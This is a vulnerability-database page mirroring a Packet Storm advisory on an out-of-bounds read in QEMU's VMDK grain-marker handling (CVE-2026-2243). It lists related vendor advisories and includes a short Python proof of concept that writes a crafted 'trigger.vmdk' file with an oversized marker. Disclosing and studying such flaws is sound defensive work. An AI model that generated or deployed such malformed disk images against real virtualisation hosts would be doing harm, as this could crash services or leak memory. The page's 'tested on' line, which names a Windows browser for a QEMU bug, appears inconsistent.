Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 QEMU VMDK Out-Of-Bounds Read

🗓️ 24 Feb 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm🔗 packetstorm.news👁 106 Views

Improper bounds validation in VMDK grain marker handling may cause out-of-bounds read.

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB		CVE-2026-2243
19 Feb 202617:47
attackerkb
Tenable Nessus		Amazon Linux 2 : qemu, --advisory ALAS2-2026-3182 (ALAS-2026-3182)
6 Mar 202600:00
nessus
Tenable Nessus		openSUSE 16 Security Update : qemu (openSUSE-SU-2026:20567-1)
22 Apr 202600:00
nessus
Tenable Nessus		Oracle Linux 8 : virt:kvm_utils3 (ELSA-2026-50239)
27 Apr 202600:00
nessus
Tenable Nessus		Oracle Linux 9 : qemu-kvm (ELSA-2026-50241)
28 Apr 202600:00
nessus
Tenable Nessus		Ubuntu 22.04 LTS / 24.04 LTS / 25.10 : QEMU vulnerabilities (USN-8161-1)
13 Apr 202600:00
nessus
Tenable Nessus		Linux Distros Unpatched Vulnerability : CVE-2026-2243
19 Feb 202600:00
nessus
Amazon		Medium: qemu
6 Mar 202600:00
amazon
Circl		CVE-2026-2243
19 Mar 202600:00
circl
CNNVD		QEMU 缓冲区错误漏洞
19 Feb 202600:00
cnnvd
Rows per page
=============================================================================================================================================
    | # Title     : Improper Bounds Validation in VMDK Grain Marker Handling Leading to Potential Out-of-Bounds Read                            |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : No standalone download available                                                                                            |
    =============================================================================================================================================
    
    [+] Summary    : A flaw may exist in the handling of compressed grain markers within the VMDK monolithicSparse format. 
                     If the size field in a grain marker is not properly validated against the remaining cluster boundary (excluding the marker header size), 
    				 the decompression routine may process more data than safely available. This can potentially result in an out-of-bounds read condition due to improper bounds checking.
                     The issue stems from failing to ensure that the declared compressed data size does not exceed the actual buffer space after accounting for 
    				 the marker structure. Proper validation of marker size, boundary checks, and strict decompression limits are required to prevent memory safety violations.
    
    [+] POC   : 
    
    import struct
    
    def create_malicious_vmdk(filename):
    
        magic = b"KDMV"
        version = struct.pack("<I", 1)
        flags = struct.pack("<I", 3) # VMDK4_COMPRESSION_MARKER
        capacity = struct.pack("<Q", 2048) 
        granularity = struct.pack("<Q", 128) 
        desc_offset = struct.pack("<Q", 1)
        desc_size = struct.pack("<Q", 1)
        rg_size = struct.pack("<I", 1)
        gd_offset = struct.pack("<Q", 0) 
    
        header = magic + version + flags + capacity + granularity + \
                 desc_offset + desc_size + rg_size + gd_offset
        header = header.ljust(512, b'\x00')
    
        lba = struct.pack("<Q", 0)
    
        malicious_size = 64 * 1024 
        size = struct.pack("<I", malicious_size)
        
        marker = lba + size
        
        data = b"\x78\x9c\x03\x00\x00\x00\x00\x01" 
        data = data.ljust(malicious_size, b'\x41')
    
        with open(filename, "wb") as f:
            f.write(header)
            f.write(marker)
            f.write(data)
    
        print(f"[*] Created malicious file: {filename}")
        print(f"[*] Marker size set to: {malicious_size} bytes")
    
    if __name__ == "__main__":
        create_malicious_vmdk("trigger.vmdk")
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
24 Feb 2026 00:00Current
5.5Medium risk
Vulners AI Score5.5
CVSS 3.15.1
EPSS0.00019
SSVC
virtual disk formatgrain marker handlingbounds validationout of bounds readdecompression limit
106